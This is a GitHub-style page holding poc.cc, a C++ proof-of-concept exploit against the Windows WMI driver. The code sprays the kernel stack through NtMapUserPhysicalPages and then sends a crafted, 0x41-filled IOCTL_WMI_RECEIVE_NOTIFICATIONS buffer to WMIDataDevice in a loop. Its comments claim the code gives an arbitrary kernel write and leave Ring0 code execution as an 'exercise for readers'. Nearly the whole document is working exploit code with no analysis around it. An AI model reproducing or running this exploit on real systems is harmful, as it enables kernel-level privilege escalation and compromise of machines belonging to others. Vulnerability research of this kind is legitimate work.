-
Notifications
You must be signed in to change notification settings - Fork 28
/
poc.cc
77 lines (60 loc) · 2.08 KB
/
poc.cc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
// with this code we can write custom data to custom address in kernel
// getting Ring0 code execution in this situation is so simple , exercise for readers
#include <windows.h>
#include <winioctl.h>
typedef union {
HANDLE Handle;
ULONG64 Handle64;
ULONG32 Handle32;
}
HANDLE3264, * PHANDLE3264;
typedef struct {
//
// List of guid notification handles
//
ULONG HandleCount;
ULONG Action;
HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
HANDLE3264 UserModeProcess;
HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, * PWMIRECEIVENOTIFICATION;
#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
typedef struct {
IN VOID * ObjectAttributes;
IN ACCESS_MASK DesiredAccess;
OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, * PWMIOPENGUIDBLOCK;
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
extern "C" ULONG STDCALL
NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
VOID SprayKernelStack() {
BYTE buffer[4096];
memset(buffer, 'B', sizeof(buffer));
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}
int main() {
DWORD dwBytesReturned;
HANDLE threadhandle;
WMIRECEIVENOTIFICATION buffer;
CHAR OutPut[1000];
memset( &buffer, '\x41', sizeof(buffer)); // set ecx to 0x41414141
buffer.HandleCount = 0;
buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
buffer.UserModeProcess.Handle = GetCurrentProcess();
HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDriver != INVALID_HANDLE_VALUE) {
while (TRUE) {
SprayKernelStack();
if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
return 1;
}
}
}
return 0;
}